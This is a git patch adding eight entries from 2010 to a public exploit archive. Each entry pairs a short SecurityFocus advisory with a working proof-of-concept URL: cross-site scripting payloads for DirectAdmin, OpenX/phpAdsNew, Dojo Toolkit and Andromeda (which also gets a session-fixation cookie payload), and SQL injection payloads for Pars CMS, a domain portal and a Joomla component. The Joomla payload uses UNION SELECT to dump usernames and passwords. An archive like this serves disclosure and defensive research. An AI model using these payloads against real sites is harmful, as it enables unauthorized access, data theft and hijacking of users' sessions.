From 6e5e5b4068f3b307658ed33509b149ac0885fd5d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 16 Jun 2014 04:38:42 +0000
Subject: [PATCH] Updated 06_16_2014

---
 files.csv                            |  8 ++++++++
 platforms/asp/webapps/33761.txt      |  7 +++++++
 platforms/multiple/webapps/33759.txt |  9 +++++++++
 platforms/multiple/webapps/33760.txt | 13 +++++++++++++
 platforms/multiple/webapps/33764.txt |  9 +++++++++
 platforms/multiple/webapps/33765.txt |  9 +++++++++
 platforms/php/webapps/33762.txt      | 10 ++++++++++
 platforms/php/webapps/33763.txt      |  7 +++++++
 platforms/php/webapps/33766.txt      |  7 +++++++
 9 files changed, 79 insertions(+)
 create mode 100755 platforms/asp/webapps/33761.txt
 create mode 100755 platforms/multiple/webapps/33759.txt
 create mode 100755 platforms/multiple/webapps/33760.txt
 create mode 100755 platforms/multiple/webapps/33764.txt
 create mode 100755 platforms/multiple/webapps/33765.txt
 create mode 100755 platforms/php/webapps/33762.txt
 create mode 100755 platforms/php/webapps/33763.txt
 create mode 100755 platforms/php/webapps/33766.txt

diff --git a/files.csv b/files.csv
index 2ae9fe6df..0d1c57adb 100755
--- a/files.csv
+++ b/files.csv
@@ -30408,3 +30408,11 @@ id,file,description,date,author,platform,type,port
 33756,platforms/php/webapps/33756.txt,"Joomla! 'com_seek' Component 'id' Parameter SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0
 33757,platforms/php/webapps/33757.txt,"Joomla! 'com_d-greinar' Component 'maintree' Parameter Cross-Site Scripting Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0
 33758,platforms/asp/webapps/33758.txt,"Zigurrat Farsi CMS 'manager/textbox.asp' SQL Injection Vulnerability",2010-03-15,Isfahan,asp,webapps,0
+33759,platforms/multiple/webapps/33759.txt,"DirectAdmin <= 1.33.6 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability",2010-03-14,r0t,multiple,webapps,0
+33760,platforms/multiple/webapps/33760.txt,"Multiple Products 'banner.swf' Cross-Site Scripting Vulnerability",2010-03-15,MustLive,multiple,webapps,0
+33761,platforms/asp/webapps/33761.txt,"Pars CMS 'RP' Parameter Multiple SQL Injection Vulnerabilities",2010-03-15,Isfahan,asp,webapps,0
+33762,platforms/php/webapps/33762.txt,"Andromeda 1.9.2 's' Parameter Cross Site Scripting and Session Fixation Vulnerabilities",2010-03-15,indoushka,php,webapps,0
+33763,platforms/php/webapps/33763.txt,"Domain Verkaus & Auktions Portal 'index.php' SQL Injection Vulnerability",2010-03-15,"Easy Laster",php,webapps,0
+33764,platforms/multiple/webapps/33764.txt,"Dojo Toolkit <= 1.4.1 dijit\tests\_testCommon.js theme Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0
+33765,platforms/multiple/webapps/33765.txt,"Dojo Toolkit <= 1.4.1 doh\runner.html Multiple Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0
+33766,platforms/php/webapps/33766.txt,"Joomla! 'com_as' Component 'catid' Parameter SQL Injection Vulnerability",2010-03-16,N2n-Hacker,php,webapps,0
diff --git a/platforms/asp/webapps/33761.txt b/platforms/asp/webapps/33761.txt
new file mode 100755
index 000000000..a8acbfcde
--- /dev/null
+++ b/platforms/asp/webapps/33761.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38734/info
+
+Pars CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/fa_default.asp?RP=' UNION SELECT TOP 3 AttrName FROM validTableName%00 
\ No newline at end of file
diff --git a/platforms/multiple/webapps/33759.txt b/platforms/multiple/webapps/33759.txt
new file mode 100755
index 000000000..0d37e162e
--- /dev/null
+++ b/platforms/multiple/webapps/33759.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38721/info
+
+DirectAdmin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker can leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+DirectAdmin 1.351 and prior versions are affected. 
+
+http://www.example.com:2222/CMD_DB_VIEW?DOMAIN=example.com&name=%22%3E%3Cscript%3Ealert%28111%29;%3C/script%3E
diff --git a/platforms/multiple/webapps/33760.txt b/platforms/multiple/webapps/33760.txt
new file mode 100755
index 000000000..7ca2d7cf5
--- /dev/null
+++ b/platforms/multiple/webapps/33760.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/38732/info
+
+Multiple products are prone to a cross-site scripting vulnerability because the applications fail to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The following products are affected:
+
+phpAdsNew
+OpenAds
+OpenX 
+
+http://www.example.com/path/banner.swf?clickTAG=javascript:alert('XSS')
\ No newline at end of file
diff --git a/platforms/multiple/webapps/33764.txt b/platforms/multiple/webapps/33764.txt
new file mode 100755
index 000000000..2e8e562df
--- /dev/null
+++ b/platforms/multiple/webapps/33764.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38739/info
+
+Dojo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Dojo 1.4.2 are vulnerable. 
+
+http://www.example.com/dijit/tests/form/test_Button.html?theme="/><script>alert(/xss/)</script>
\ No newline at end of file
diff --git a/platforms/multiple/webapps/33765.txt b/platforms/multiple/webapps/33765.txt
new file mode 100755
index 000000000..d1b977f6c
--- /dev/null
+++ b/platforms/multiple/webapps/33765.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38739/info
+ 
+Dojo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+Versions prior to Dojo 1.4.2 are vulnerable. 
+
+http://www.example.com/util/doh/runner.html?dojoUrl=&#039;/>foo</script><&#039;"<script>alert(/xss/)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/33762.txt b/platforms/php/webapps/33762.txt
new file mode 100755
index 000000000..efd7c6efa
--- /dev/null
+++ b/platforms/php/webapps/33762.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/38735/info
+
+Andromeda is prone to a cross-site scripting vulnerability and a session-fixation vulnerability.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and gain unauthorized access to the affected application.
+
+Andromeda 1.9.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<meta+http-equiv=&#039;Set-cookie&#039;+content=&#039;cookiename=cookievalue&#039;>
+http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<img+src=http://www.example.com/1.JPG+onload=alert(00213771818860)>
\ No newline at end of file
diff --git a/platforms/php/webapps/33763.txt b/platforms/php/webapps/33763.txt
new file mode 100755
index 000000000..d0d1b2ae7
--- /dev/null
+++ b/platforms/php/webapps/33763.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38737/info
+
+Domain Verkaus & Auktions Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/portal/index.php?a=d&id=[SQLi] 
\ No newline at end of file
diff --git a/platforms/php/webapps/33766.txt b/platforms/php/webapps/33766.txt
new file mode 100755
index 000000000..0cad0a69c
--- /dev/null
+++ b/platforms/php/webapps/33766.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38757/info
+
+The 'com_as' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_as&as=100&catid=-20 UNION SELECT 1,2,3,concat(username,0x3a,password)...+from+jos_users-- 
\ No newline at end of file